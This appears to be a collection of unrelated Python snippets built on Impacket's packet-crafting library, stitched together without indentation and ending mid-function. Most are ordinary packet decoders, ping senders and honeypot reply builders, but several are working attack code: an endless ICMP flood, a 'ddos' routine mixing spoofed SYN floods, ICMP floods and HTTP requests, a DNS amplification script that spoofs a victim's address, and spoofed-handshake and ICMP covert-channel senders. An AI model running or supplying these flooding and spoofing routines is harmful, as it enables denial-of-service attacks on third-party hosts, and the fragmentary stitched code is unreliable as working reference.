def decode(self, aBuffer):
i = ImpactPacket.IP(aBuffer)
self.set_decoded_protocol(i)
off = i.get_header_size()
end = i.get_ip_len()
# If ip_len == 0 we might be facing TCP segmentation offload, let's calculate the right len
if end == 0:
LOG.warning(
'IP len reported as 0, most probably because of TCP segmentation offload. Attempting to fix its size'
)
i.set_ip_len(len(aBuffer))
end = i.get_ip_len()
if i.get_ip_p() == ImpactPacket.UDP.protocol:
self.udp_decoder = UDPDecoder()
packet = self.udp_decoder.decode(aBuffer[off:end])
elif i.get_ip_p() == ImpactPacket.TCP.protocol:
self.tcp_decoder = TCPDecoder()
packet = self.tcp_decoder.decode(aBuffer[off:end])
elif i.get_ip_p() == ImpactPacket.ICMP.protocol:
self.icmp_decoder = ICMPDecoder()
packet = self.icmp_decoder.decode(aBuffer[off:end])
elif i.get_ip_p() == ImpactPacket.IGMP.protocol:
self.igmp_decoder = IGMPDecoder()
packet = self.igmp_decoder.decode(aBuffer[off:end])
else:
self.data_decoder = DataDecoder()
packet = self.data_decoder.decode(aBuffer[off:end])
i.contains(packet)
return i
def ip_tcp_pack(src_ip="127.0.0.1",
dst_ip="127.0.0.1",
src_port=2333,
dst_port=80,
ip_id=0,
seq_num=0,
ack_num=0,
syn=0,
ack=0,
windows=64):
ip = ImpactPacket.IP()
ip.set_ip_src(src_ip)
ip.set_ip_dst(dst_ip)
if ip_id != 0:
ip.set_ip_id(ip_id)
ip.set_ip_p(6)
# ip.set_ip_len(40)
tcp = ImpactPacket.TCP()
tcp.set_th_sport(src_port)
tcp.set_th_dport(dst_port)
if seq_num != 0:
tcp.set_th_seq(seq_num)
if ack_num != 0:
tcp.set_th_ack(ack_num)
if syn:
tcp.set_SYN()
if ack:
tcp.set_ACK()
tcp.set_th_win(windows)
ip.contains(tcp)
tcp.calculate_checksum()
return ip.get_packet()
def icmp_reply(self, eth_src, eth_dst, ip_src, ip_dst, i_type, i_code,
ip_pkt):
# TODO: we have access to the personality here
"""Function creates and sends back an ICMP reply
Args:
eth_src : ethernet source address
eth_dst : ethernet destination address
ip_src : ip source address
ip_dst : ip destination address
i_type : type of the icmp reply
i_code : code of the icmp reply
"""
# truncate inner packet
l = ip_pkt.get_ip_len()
hdr = None
if l > 1472: # (MTU) 1500 - (IPv4) 20 - (ICMP) 8 = 1472
hdr = ip_pkt.get_packet()[:1472]
else:
hdr = ip_pkt.get_packet()
# icmp packet
reply_icmp = ImpactPacket.ICMP()
reply_icmp.set_icmp_type(i_type)
reply_icmp.set_icmp_code(i_code)
reply_icmp.set_icmp_id(0)
reply_icmp.set_icmp_seq(0)
reply_icmp.set_icmp_void(0)
reply_icmp.contains(ImpactPacket.Data(hdr))
reply_icmp.calculate_checksum()
reply_icmp.auto_checksum = 1
# ip packet
reply_ip = ImpactPacket.IP()
reply_ip.set_ip_v(4)
reply_ip.set_ip_p(1)
reply_ip.set_ip_rf(False)
reply_ip.set_ip_df(False)
reply_ip.set_ip_mf(False)
reply_ip.set_ip_src(ip_src)
reply_ip.set_ip_dst(ip_dst)
reply_ip.set_ip_id(
random.randint(0, 50000)
) # TODO: provide IP IDs according to personality, altough tracepath does not care
reply_ip.contains(reply_icmp)
# ethernet frame
reply_eth = ImpactPacket.Ethernet()
reply_eth.set_ether_type(0x800)
eth_src = [int(i, 16) for i in eth_src.split(':')]
eth_dst = [int(i, 16) for i in eth_dst.split(':')]
reply_eth.set_ether_shost(eth_src)
reply_eth.set_ether_dhost(eth_dst)
reply_eth.contains(reply_ip)
logger.debug('Sending reply: %s', reply_eth)
# send raw frame
try:
self.pcapy_object.sendpacket(reply_eth.get_packet())
except pcapy.PcapError as ex:
logger.exception('Exception: Cannot send reply packet: %s', ex)
def sendReply(nonce):
#build ethernet frame
eth = ImpactPacket.Ethernet()
eth.set_ether_type(0x88b5)
eth.set_ether_shost(ETH_MY_MAC)
eth.set_ether_dhost(ETH_MY_MAC)
#build ip packet
ip = ImpactPacket.IP()
ip.set_ip_v(4)
ip.set_ip_len(32)
ip.set_ip_src("127.0.0.1")
ip.set_ip_dst("127.0.0.1")
#build UDP packet
udp = ImpactPacket.UDP()
udp.set_uh_sport(62001)
udp.set_uh_dport(62000)
udp.set_uh_ulen(12)
payload = nonce
udp.contains(ImpactPacket.Data(payload))
ip.contains(udp)
eth.contains(ip)
device = findalldevs()[0]
s = socket.socket(socket.AF_PACKET, socket.SOCK_RAW, socket.htons(0x88b5))
s.bind(('lo', 0))
s.send(eth.get_packet())
print "Sent: " + nonce
signal.alarm(0) #disable the alarm
def filtered(self, packet, path, personality, **kwargs):
"""Function defines filtered port behavior - filtered is defined according to nmap"""
callback_ipid = kwargs.get('cb_ipid', None)
callback_icmpid = kwargs.get('cb_icmpid', None)
# respond with ICMP error type 3 code 13 OR ignore
# icmp packet
reply_icmp = ImpactPacket.ICMP()
reply_icmp.set_icmp_type(ImpactPacket.ICMP.ICMP_UNREACH)
reply_icmp.set_icmp_code(ImpactPacket.ICMP.ICMP_UNREACH_FILTERPROHIB)
reply_icmp.set_icmp_id(callback_icmpid()) # unused field
reply_icmp.set_icmp_seq(0) # unused field
reply_icmp.calculate_checksum()
reply_icmp.auto_checksum = 1
# ip packet
reply_ip = ImpactPacket.IP()
reply_ip.set_ip_v(4)
reply_ip.set_ip_p(1)
reply_ip.set_ip_rf(False)
reply_ip.set_ip_df(False)
reply_ip.set_ip_mf(False)
reply_ip.set_ip_src(packet.get_ip_dst())
reply_ip.set_ip_dst(packet.get_ip_src())
reply_ip.set_ip_id(callback_ipid())
reply_ip.auto_checksum = 1
reply_ip.contains(reply_icmp)
return reply_ip
def send_one_ping(cls, current_socket, src, dst, icmp_packet_id, payload):
# print("SEND : " + src[-1] + " -> " + dst[-1] + " Payload : " + payload)
#Create a new IP packet and set its source and destination IP addresses
ip = ImpactPacket.IP()
ip.set_ip_src(src)
ip.set_ip_dst(dst)
#Create a new ICMP ECHO_REQUEST packet
icmp = ImpactPacket.ICMP()
icmp.set_icmp_type(icmp.ICMP_ECHO)
#inlude a small payload inside the ICMP packet
#and have the ip packet contain the ICMP packet
icmp.contains(ImpactPacket.Data(payload))
ip.contains(icmp)
#give the ICMP packet some ID
icmp.set_icmp_id(icmp_packet_id)
#set the ICMP packet checksum
icmp.set_icmp_cksum(0)
icmp.auto_checksum = 1
send_time = default_timer()
# send the provided ICMP packet over a 3rd socket
try:
current_socket.sendto(
ip.get_packet(),
(dst, 1)) # Port number is irrelevant for ICMP
except socket.error as e:
print("# socket creation failed.")
current_socket.close()
return
def send_message(self, source_ip, dest_ip, current_socket, msg, seq_number,
is_ret):
#Create a new IP packet and set its source and destination IP addresses
src = source_ip
dst = dest_ip
ip = ImpactPacket.IP()
#print(src.__str__() + " to " + dst.__str__())
ip.set_ip_src(src)
ip.set_ip_dst(dst)
#Create a new ICMP ECHO_REQUEST packet
icmp = ImpactPacket.ICMP()
icmp.set_icmp_type(icmp.ICMP_ECHO)
#inlude a small payload inside the ICMP packet
#and have the ip packet contain the ICMP packet
icmp.contains(ImpactPacket.Data(msg))
ip.contains(icmp)
#give the ICMP packet some ID
if is_ret:
icmp.set_icmp_id(0x04)
else:
icmp.set_icmp_id(0x03)
#set the ICMP packet checksum
icmp.set_icmp_cksum(0)
icmp.auto_checksum = 1
icmp.set_icmp_seq(seq_number)
self.send_packet(current_socket, ip.get_packet(), dst)
def flood(src, dst):
# create packet
ip = ImpactPacket.IP()
ip.set_ip_src(src)
ip.set_ip_dst(dst)
icmp = ImpactPacket.ICMP()
icmp.set_icmp_type(icmp.ICMP_ECHO)
# Include a 156-character long payload inside the ICMP packet.
icmp.contains(ImpactPacket.Data("A" * 156))
# Have the IP packet contain the ICMP packet (along with its payload).
ip.contains(icmp)
seq_id = 0
while 1:
# Give the ICMP packet the next ID in the sequence.
seq_id += 1
icmp.set_icmp_id(seq_id)
# Calculate its checksum.
icmp.set_icmp_cksum(0)
icmp.auto_checksum = 1
# send packet
s = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_ICMP)
s.setsockopt(socket.IPPROTO_IP, socket.IP_HDRINCL, 1)
# Send it to the target host.
s.sendto(ip.get_packet(), (dst, 0))
print("sent from %s of sid: %d" % (src, seq_id))
continue
def filtered(self, packet, path, personality, **kwargs):
"""Function defines filtered port behavior - filtered is defined according to nmap"""
callback_ipid = kwargs.get('cb_ipid', None)
# respond with ICMP error type 3 code 13 OR ignore
# icmp packet
reply_icmp = ImpactPacket.ICMP()
reply_icmp.set_icmp_type(ImpactPacket.ICMP.ICMP_UNREACH)
reply_icmp.set_icmp_code(ImpactPacket.ICMP.ICMP_UNREACH_FILTERPROHIB)
reply_icmp.set_icmp_void(0)
reply_icmp.set_icmp_id(0)
reply_icmp.set_icmp_seq(0)
hdr = None
l = packet.get_ip_len()
if l > 1472: # 1500 - 20 - 8 (MTU - IP - ICMP)
hdr = packet.get_packet()[:1472]
else:
hdr = packet.get_packet()
reply_icmp.contains(ImpactPacket.Data(hdr))
reply_icmp.calculate_checksum()
reply_icmp.auto_checksum = 1
# ip packet
reply_ip = ImpactPacket.IP()
reply_ip.set_ip_v(4)
reply_ip.set_ip_p(1)
reply_ip.set_ip_rf(False)
reply_ip.set_ip_df(False)
reply_ip.set_ip_mf(False)
reply_ip.set_ip_src(packet.get_ip_dst())
reply_ip.set_ip_dst(packet.get_ip_src())
reply_ip.set_ip_id(callback_ipid())
# check T
ttl = 0x7f
if 'T' in personality.fp_ie:
try:
ttl = personality.fp_ie['T'].split('-')
# using minimum ttl
ttl = int(ttl[0], 16)
except BaseException:
raise Exception('Unsupported IE:T=%s', personality.fp_ie['T'])
# check TG
if 'TG' in personality.fp_ie:
try:
ttl = int(personality.fp_ie['TG'], 16)
except BaseException:
raise Exception('Unsupported IE:TG=%s',
personality.fp_ie['TG'])
delta_ttl = ttl - path
if delta_ttl < 1:
logger.debug(
'Reply packet dropped: TTL reached 0 within virtual network.')
return None
reply_ip.set_ip_ttl(delta_ttl)
reply_ip.auto_checksum = 1
reply_ip.contains(reply_icmp)
return reply_ip
def fakeConnection(self, argv, argc):
dhost = argv[1] # The remote host
dport = int(argv[2]) # The same port as used by the server
sport = dport # The source port
shost = argv[3] # The source host
if argc >= 5:
SYN = int(argv[4])
if argc == 6:
ACK = int(argv[5])
# Create a new IP packet and set its source and destination addresses.
ip = ImpactPacket.IP()
ip.set_ip_src(shost)
ip.set_ip_dst(dhost)
# Create a new TCP
tcp = ImpactPacket.TCP()
# Set the parameters for the connection
tcp.set_th_sport(sport)
tcp.set_th_dport(dport)
tcp.set_th_seq(SYN)
tcp.set_SYN()
if argc == 6:
tcp.set_th_ack(ACK)
tcp.set_ACK()
# Have the IP packet contain the TCP packet
ip.contains(tcp)
# Open a raw socket. Special permissions are usually required.
protocol_num = socket.getprotobyname('tcp')
self.s = socket.socket(socket.AF_INET, socket.SOCK_RAW, protocol_num)
self.s.setsockopt(socket.IPPROTO_IP, socket.IP_HDRINCL, 1)
# Calculate its checksum.
tcp.calculate_checksum()
tcp.auto_checksum = 1
# Send it to the target host.
self.s.sendto(ip.get_packet(), (dhost, dport))
# Instantiate an IP packets decoder.
# As all the packets include their IP header, that decoder only is enough.
decoder = ImpactDecoder.IPDecoder()
while 1:
packet = self.s.recvfrom(4096)[0]
# Packet received. Decode and display it.
packet = decoder.decode(packet)
print 'source:', packet.get_ip_src()
#print packet.get_ip_src(), packet.child().get_th_sport()
if isinstance(packet.child(),ImpactPacket.TCP) and \
packet.child().get_th_sport() > 50000:
self._sniffed(packet)
def emitter(self):
""" The emitter method is responsible for establishing the connections or sending the packets associated with
the plugin. Emitter MUST use the encoder() method to assemble payloads
:return: True if successful
"""
try:
src = self.getlocaladdr()
try:
dst = socket.gethostbyname(self.target)
except Exception as e:
dst = self.target
self.logger.error('Failed to resolve target hostname for %s: %s' % (self.__class__.__name__, e))
raise e
# Fetch the icmptype property as a list
icmptypes = self.listproperty('icmptype')
print icmptypes
if not icmptypes:
icmptypes = [8]
# Send the payload to the encoder which returns a generator, then iterate over the chunked and encoded
# payload
for payload in self.encoder(self.payload):
# Iterate over all of the specified types for this payload and execute the delivery
for icmptype in icmptypes:
ip = ImpactPacket.IP()
ip.set_ip_src(src)
ip.set_ip_dst(dst)
icmp = ImpactPacket.ICMP()
icmp.set_icmp_type(icmptype)
seq_id = 0
s = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_ICMP)
s.setsockopt(socket.IPPROTO_IP, socket.IP_HDRINCL, 1)
icmp.contains(ImpactPacket.Data(payload))
ip.contains(icmp)
icmp.set_icmp_id(seq_id)
icmp.set_icmp_cksum(0)
icmp.auto_checksum = 1
s.sendto(ip.get_packet(), (self.target, 0))
seq_id += 1
except socket.error:
raise
except Exception:
raise
return True
def decode(self, aBuffer):
i = ImpactPacket.IP(aBuffer)
self.set_decoded_protocol(i)
off = i.get_header_size()
if i.get_ip_p() == ImpactPacket.UDP.protocol:
self.udp_decoder = UDPDecoder()
packet = self.udp_decoder.decode(aBuffer[off:])
else:
self.data_decoder = DataDecoder()
packet = self.data_decoder.decode(aBuffer[off:])
i.contains(packet)
return i
def main():
if len(sys.argv) < 3:
print("Use: %s <src ip> <dst ip>" % sys.argv[0])
print("Use: %s <src ip> <dst ip> <cnt>" % sys.argv[0])
sys.exit(1)
elif len(sys.argv) == 3:
src = sys.argv[1]
dst = sys.argv[2]
cnt = 1
elif len(sys.argv) == 4:
src = sys.argv[1]
dst = sys.argv[2]
cnt = sys.argv[3]
else:
print("Input error!")
sys.exit(1)
# print src, dst
ip = ImpactPacket.IP()
ip.set_ip_src(src)
ip.set_ip_dst(dst)
# Create a new ICMP packet of type ECHO.
icmp = ImpactPacket.ICMP()
tcp = ImpactPacket.TCP()
tcp.set_th_sport(55968)
tcp.set_th_dport(80)
tcp.set_th_seq(1)
tcp.set_th_ack(1)
tcp.set_th_flags(0x18)
tcp.set_th_win(64)
tcp.contains(
ImpactPacket.Data(
"GET /att/DIYLife/41264/528 HTTP/1.1\r\nHost: 192.168.111.1\r\nAccept-Encoding: identity\r\n\r\n"
))
ip.contains(tcp)
# Open a raw socket. Special permissions are usually required.
s = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_TCP)
s.setsockopt(socket.IPPROTO_IP, socket.IP_HDRINCL, 1)
seq_id = 0
while cnt >= 1:
# Calculate its checksum.
seq_id = seq_id + 1
tcp.set_th_seq(seq_id)
tcp.calculate_checksum()
# Send it to the target host.
s.sendto(ip.get_packet(), (dst, 80))
cnt = cnt - 1
def create_packet(self):
# IP paket
self.ip = ImpactPacket.IP()
# ICMP paket
self.icmp = ImpactPacket.ICMP()
if self.operating_as == CLIENT:
# ako smo CLIENT koristimo ECHO, inace ECHOREPLY
self.icmp.set_icmp_type(self.icmp.ICMP_ECHO)
else:
self.icmp.set_icmp_type(self.icmp.ICMP_ECHOREPLY)
self.ip.set_ip_ttl(64) # emulacija linux OS-a
self.ip.set_ip_src(self.src_ip_addr)
self.ip.set_ip_dst(self.dst_ip_addr)
def alive(src, dst):
# Create a new IP packet and set its source and destination addresses.
ip = ImpactPacket.IP()
ip.set_ip_src(src)
ip.set_ip_dst(dst)
# Create a new ICMP packet of type ECHO.
icmp = ImpactPacket.ICMP()
icmp.set_icmp_type(icmp.ICMP_ECHO)
# Include a 156-character long payload inside the ICMP packet.
icmp.contains(ImpactPacket.Data("A" * 156))
# Have the IP packet contain the ICMP packet (along with its payload).
ip.contains(icmp)
# Open a raw socket. Special permissions are usually required.
s = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_ICMP)
s.setsockopt(socket.IPPROTO_IP, socket.IP_HDRINCL, 1)
seq_id = 0
# Give the ICMP packet the next ID in the sequence.
seq_id += 1
icmp.set_icmp_id(seq_id)
# Calculate its checksum.
icmp.set_icmp_cksum(0)
icmp.auto_checksum = 1
# Send it to the target host.
s.sendto(ip.get_packet(), (dst, 0))
for i in range(3):
# Wait for incoming replies.
if s in select.select([s], [], [], 1)[0]:
reply = s.recvfrom(2000)[0]
# Use ImpactDecoder to reconstruct the packet hierarchy.
rip = ImpactDecoder.IPDecoder().decode(reply)
# Extract the ICMP packet from its container (the IP packet).
ricmp = rip.child()
# If the packet matches, report it to the user.
if rip.get_ip_dst() == src and rip.get_ip_src(
) == dst and icmp.ICMP_ECHOREPLY == ricmp.get_icmp_type():
return True
time.sleep(1)
return False
def buildAnswer(self, in_onion):
eth = ImpactPacket.Ethernet()
ip = ImpactPacket.IP()
eth.contains(ip)
eth.set_ether_shost(in_onion[O_ETH].get_ether_dhost())
eth.set_ether_dhost(in_onion[O_ETH].get_ether_shost())
ip.set_ip_src(in_onion[O_IP].get_ip_dst())
ip.set_ip_dst(in_onion[O_IP].get_ip_src())
ip.set_ip_id(self.machine.getIPID())
return [eth, ip]
def send_one_ping(self,src,dst,current_socket,icmp_payload):
ip = ImpactPacket.IP()
ip.set_ip_src(src)
ip.set_ip_dst(dst)
icmp = ImpactPacket.ICMP()
icmp.set_icmp_type(icmp.ICMP_ECHO)
icmp.contains(ImpactPacket.Data(icmp_payload))
ip.contains(icmp)
icmp.set_icmp_id(0x03)
icmp.set_icmp_cksum(0)
icmp.auto_checksum = 1
send_time = default_timer()
current_socket.sendto(ip.get_packet(), (dst, 1))
def opened(self, packet, path, personality, **kwargs):
"""Function defines open port behavior"""
callback_ipid = kwargs.get('cb_ipid', None)
# send rUDP
udp_packet = packet.child()
# udp datagram
reply_udp = ImpactPacket.UDP()
reply_udp.set_uh_sport(udp_packet.get_uh_dport())
reply_udp.set_uh_dport(udp_packet.get_uh_sport())
reply_udp.auto_checksum = 1
reply_udp.calculate_checksum()
# ip packet
reply_ip = ImpactPacket.IP()
reply_ip.set_ip_v(4)
reply_ip.set_ip_p(17)
reply_ip.set_ip_rf(False)
reply_ip.set_ip_df(False)
reply_ip.set_ip_mf(False)
reply_ip.set_ip_src(packet.get_ip_dst())
reply_ip.set_ip_dst(packet.get_ip_src())
reply_ip.set_ip_id(callback_ipid())
# check T
ttl = 0x7f
if 'T' in personality.fp_u1:
try:
ttl = personality.fp_u1['T'].split('-')
# using minimum ttl
ttl = int(ttl[0], 16)
except BaseException:
raise Exception('Unsupported U1:T=%s', personality.fp_u1['T'])
# check TG
if 'TG' in personality.fp_u1:
try:
ttl = int(personality.fp_u1['TG'], 16)
except BaseException:
raise Exception('Unsupported U1:TG=%s',
personality.fp_u1['TG'])
delta_ttl = ttl - path
if delta_ttl < 1:
logger.debug(
'Reply packet dropped: TTL reached 0 within virtual network.')
return None
reply_ip.set_ip_ttl(delta_ttl)
reply_ip.auto_checksum = 1
reply_ip.contains(reply_udp)
return reply_ip
def encodePacket(self, src, dst, type, code, ttl, payload):
payload = ImpactPacket.Data(payload)
icmpDatagram = ImpactPacket.ICMP()
icmpDatagram.set_icmp_type(type)
if code:
icmpDatagram.set_icmp_code(code)
icmpDatagram.set_icmp_lifetime(ttl)
icmpDatagram.set_icmp_ttime(ttl)
icmpDatagram.contains(payload)
ipDatagram = ImpactPacket.IP()
ipDatagram.set_ip_src(src)
ipDatagram.set_ip_dst(dst)
ipDatagram.contains(icmpDatagram)
self.raw = ipDatagram.get_packet()
def read(self, timeout): try: data = self.mySniffer.read(timeout) except: raise ReadTimeout # so we have data, now process it ip_pkt = ImpactPacket.IP(data) offset = ip_pkt.get_header_size() if not ip_pkt.get_ip_p() == ImpactPacket.UDP.protocol: raise NotUDP udp_pkt = ImpactPacket.UDP(data[offset:]) offset += udp_pkt.get_header_size() dnsmsg = dns.message.from_wire(data[offset:]) return dnsmsg
def main():
signal.signal(signal.SIGALRM, lambda *args: handle_alarm())
#build ethernet frame
eth = ImpactPacket.Ethernet()
eth.set_ether_type(0x88b5)
eth.set_ether_shost(ETH_MY_MAC)
eth.set_ether_dhost(ETH_MY_MAC)
#build ip packet
ip = ImpactPacket.IP()
ip.set_ip_v(4)
ip.set_ip_len(32)
ip.set_ip_src("127.0.0.1")
ip.set_ip_dst("127.0.0.1")
#build UDP packet
udp = ImpactPacket.UDP()
udp.set_uh_sport(62000)
udp.set_uh_dport(62001)
udp.set_uh_ulen(12)
inp1 = ''
print "Client.... Port: " + str(udp.get_uh_sport())
print "--------------------------------------------"
while (len(inp1) != 4):
inp1 = raw_input('Enter 4-bit ASCII nonce to send: ')
if (len(inp1) != 4):
print "Enter 4-bit ASCII"
payload = inp1
udp.contains(ImpactPacket.Data(payload))
ip.contains(udp)
eth.contains(ip)
device = 'lo'
s = socket.socket(socket.AF_PACKET, socket.SOCK_RAW, socket.htons(0x88b5))
s.bind((device, 0))
s.send(eth.get_packet())
print "Sent: " + inp1
receiveReply()
def fakeConnection(self, table):
for i in (0, 1):
port = 50007
dhost = table[i][0][0] # The remote host
shost = table[(i + 1) % 2][0][0] # The source host
dport = port # The same port as used by the server
sport = dport # The source port
SYN = table[(i + 1) % 2][1]
ACK = table[i][1] + 1
# Create a new IP packet and set its source and destination addresses.
ip = ImpactPacket.IP()
print 'IPs:', shost, dhost
ip.set_ip_src(shost)
ip.set_ip_dst(dhost)
# Create a new TCP
tcp = ImpactPacket.TCP()
# Set the parameters for the connection
print 'Ports:', sport, dport
tcp.set_th_sport(sport)
tcp.set_th_dport(dport)
print 'SYN-ACK:', SYN, ACK
tcp.set_th_seq(SYN)
tcp.set_SYN()
tcp.set_th_ack(ACK)
tcp.set_ACK()
# Have the IP packet contain the TCP packet
ip.contains(tcp)
# Open a raw socket. Special permissions are usually required.
protocol_num = socket.getprotobyname('tcp')
self.s = socket.socket(socket.AF_INET, socket.SOCK_RAW,
protocol_num)
self.s.setsockopt(socket.IPPROTO_IP, socket.IP_HDRINCL, 1)
#self._bind()
# Calculate its checksum.
tcp.calculate_checksum()
tcp.auto_checksum = 1
# Send it to the target host.
self.s.sendto(ip.get_packet(), (dhost, dport))
def send_one_ping(self, current_socket, data, identifier):
print "-Sending an ICMP ECHO_REQUEST packet from {0} to {1}".format(
self.source, self.destination)
src, dst = self.source, self.destination
ip = ImpactPacket.IP()
ip.set_ip_src(src)
ip.set_ip_dst(dst)
icmp = ImpactPacket.ICMP()
icmp.set_icmp_type(icmp.ICMP_ECHO)
icmp.contains(ImpactPacket.Data(data))
ip.contains(icmp)
icmp.set_icmp_id(identifier)
icmp.set_icmp_cksum(0)
icmp.auto_checksum = 1
try:
current_socket.sendto(ip.get_packet(), (dst, 1))
except socket.error:
current_socket.close()
def fakeConnection(self, argv, argc):
dhost = argv[1] # The remote host
dport = int(argv[2]) # The same port as used by the server
sport = dport # The source port
shost = argv[3] # The source host
if argc >= 5:
SYN = int(argv[4])
if argc == 6:
ACK = int(argv[5])
# Create a new IP packet and set its source and destination addresses.
ip = ImpactPacket.IP()
ip.set_ip_src(shost)
ip.set_ip_dst(dhost)
# Create a new TCP
tcp = ImpactPacket.TCP()
# Set the parameters for the connection
tcp.set_th_sport(sport)
tcp.set_th_dport(dport)
tcp.set_th_seq(SYN)
tcp.set_SYN()
if argc == 6:
tcp.set_th_ack(ACK)
tcp.set_ACK()
# Have the IP packet contain the TCP packet
ip.contains(tcp)
# Open a raw socket. Special permissions are usually required.
protocol_num = socket.getprotobyname('tcp')
self.s = socket.socket(socket.AF_INET, socket.SOCK_RAW, protocol_num)
self.s.setsockopt(socket.IPPROTO_IP, socket.IP_HDRINCL, 1)
# Calculate its checksum.
tcp.calculate_checksum()
tcp.auto_checksum = 1
# Send it to the target host.
self.s.sendto(ip.get_packet(), (dhost, dport))
def main():
if not (len(sys.argv) == 3):
print "Syntax:"
print " python amplify-dns.py <dns-server> <target>"
print " dns-server is the IP address of the DNS server who's replies will be redirected to the target."
print " target is the IP address of the attack target."
print
print "DO NOT DISTRIBUTE THIS CODE. It can do bad things; use it for learning, not for evil."
exit()
server_address = (sys.argv[1], 53)
target_address = (sys.argv[2], 8080)
# Create a UDP/IP socket
sock = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_UDP)
try:
sock.setsockopt(socket.IPPROTO_IP, socket.IP_HDRINCL, 1)
#sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
#sock.bind(target_address) # spoof sender address so response goes to the target
random.seed() # randome used to generate unique-(ish) Transaction IDs
ip = ImpactPacket.IP()
ip.set_ip_src(target_address[0])
ip.set_ip_dst(server_address[0])
udp = ImpactPacket.UDP()
udp.set_uh_sport(target_address[1])
udp.set_uh_dport(server_address[1])
ip.contains(udp)
request_msg = create_dns_request("www.cs6250.com")
while True:
time.sleep(0.1)
# Replace Transaction ID on each retransmission (so they look unique)
request_msg[0] = struct.pack('!BB', random.randint(0, 255),
random.randint(0, 255))
udp.contains(ImpactPacket.Data("".join(request_msg)))
sock.sendto(ip.get_packet(), server_address)
finally:
sock.close()
def send_one_ping(self, current_socket):
#Create a new IP packet and set its source and destination IP addresses
# src = srcIP
src = getSrcIP()
print("src is %s" % (src))
dst = self.destination
ip = ImpactPacket.IP()
ip.set_ip_src(src)
ip.set_ip_dst(dst)
#Create a new ICMP ECHO_REQUEST packet
icmp = ImpactPacket.ICMP()
icmp.set_icmp_type(icmp.ICMP_ECHO)
#inlude a small payload inside the ICMP packet
#and have the ip packet contain the ICMP packet
# put files here
icmp.contains(ImpactPacket.Data(str(requests)))
ip.contains(icmp)
#give the ICMP packet some ID
icmp.set_icmp_id(0x03)
#set the ICMP packet checksum
icmp.set_icmp_cksum(0)
icmp.auto_checksum = 1
send_time = default_timer()
# send the provided ICMP packet over a 3rd socket
try:
current_socket.sendto(
ip.get_packet(),
(dst, 1)) # Port number is irrelevant for ICMP
except socket.error as e:
self.response.output.append("General failure (%s)" % (e.args[1]))
current_socket.close()
return
return send_time
def main():
'''main function for using as cli'''
args = get_args()
query = dns.message.make_query(args.qname,
dns.rdatatype.from_text(args.qtype),
dns.rdataclass.from_text(args.qclass))
if args.nsid:
query.use_edns(payload=4096,
options=[dns.edns.GenericOption(dns.edns.NSID, '')])
data = ImpactPacket.Data(query.to_wire())
udp = ImpactPacket.UDP()
udp.set_uh_sport(args.source_port)
udp.set_uh_dport(args.destination_port)
udp.contains(data)
ip = ImpactPacket.IP()
ip.set_ip_src(args.source)
ip.set_ip_dst(args.destination)
ip.contains(udp)
s = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_UDP)
s.setsockopt(socket.IPPROTO_IP, socket.IP_HDRINCL, 1)
s.sendto(ip.get_packet(), (args.destination, args.destination_port))
def SendICMP(srcIP, dstIP, sessionNr, counter):
""" SendICMP sends a specially crafted ICMP packet """
# prepare the IP part
ip = ImpactPacket.IP()
ip.set_ip_src(srcIP)
ip.set_ip_dst(dstIP)
#this counter isn't used.
ip.set_ip_id(counter)
# prepare the ICMP part
icmp = ImpactPacket.ICMP()
#is used to read out uniquenumber in case of DU ICMP reply
icmp.set_icmp_id(sessionNr)
#is used to read out sessionnumber in case of DU ICMP reply
icmp.set_icmp_seq(counter)
#auto generate checksum
icmp.set_icmp_cksum(0)
icmp.auto_checksum = 1
icmp.set_icmp_type(icmp.ICMP_ECHO)
# prepare the payload
# put the target IP and the sequence number in the payload also for later recovery
data = socket.inet_aton(dstIP) + struct.pack(
'H', socket.htons(sessionNr)) + struct.pack('H', socket.htons(counter))
# compose the total packet IP / icmp / payload
icmp.contains(ImpactPacket.Data(data))
ip.contains(icmp)
# Open a raw socket. Special permissions are usually required.
s = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_ICMP)
s.setsockopt(socket.IPPROTO_IP, socket.IP_HDRINCL, 1)
# and set it free
s.sendto(ip.get_packet(), (dstIP, 0))
# return timestamp for further reference
return time.time()
def ddos(src, dst):
#Create a new IP packet and set its source and destination addresses
ip = ImpactPacket.IP()
ip.set_ip_src(src)
ip.set_ip_dst(dst)
#Create a new ICMP packet
icmp = ImpactPacket.ICMP()
icmp.set_icmp_type(icmp.ICMP_ECHO)
#inlude a small payload inside the ICMP packet
#and have the ip packet contain the ICMP packet
icmp.contains(ImpactPacket.Data("O" * 100))
ip.contains(icmp)
n = 0
while (1):
print("Spoofing from %s" % src)
#Using Scapy to SYN flood
p1 = IP(dst=target_ip, src=src) / TCP(
dport=8080, sport=5000, flags='S')
send(p1)
s = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_ICMP)
s.setsockopt(socket.IPPROTO_IP, socket.IP_HDRINCL, 1)
#Using ImpactPacket to flood/spoof
icmp.set_icmp_id(1)
#calculate checksum
icmp.set_icmp_cksum(0)
icmp.auto_checksum = 0
s.sendto(ip.get_packet(), (dst, 8080))
#Regular socket connection
ddos = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
ddos.connect((target_ip, port))
ddos.send("GET /%s HTTP/1.1\r\n" % message)
def send_one_ping(self, current_socket, ip_header, payload):
if payload[0:6] == "finish":
firstNode = randint(1, 4)
while (firstNode == self.bezi):
firstNode = randint(1, 4)
self.source = "10.0.0." + str(firstNode)
self.destination = "10.0.0." + str(self.bezi)
else:
firstNode = randint(1, 4)
secondNode = randint(1, 4)
while (secondNode == self.nodeNum or secondNode == firstNode):
firstNode = randint(1, 4)
secondNode = randint(1, 4)
self.source = "10.0.0." + str(firstNode)
self.destination = "10.0.0." + str(secondNode)
print(self.source)
print(self.destination)
src = self.source
dst = self.destination
ip = ImpactPacket.IP()
ip.set_ip_src(src)
ip.set_ip_dst(dst)
icmp = ImpactPacket.ICMP()
icmp.contains(ImpactPacket.Data(payload))
icmp.set_icmp_type(icmp.ICMP_ECHO)
ip.contains(icmp)
icmp.set_icmp_id(icmp.get_icmp_id()) ####
icmp.set_icmp_cksum(0)
icmp.auto_checksum = 1
send_time = default_timer()
try:
current_socket.sendto(ip.get_packet(), (dst, 1))
except socket.error as e:
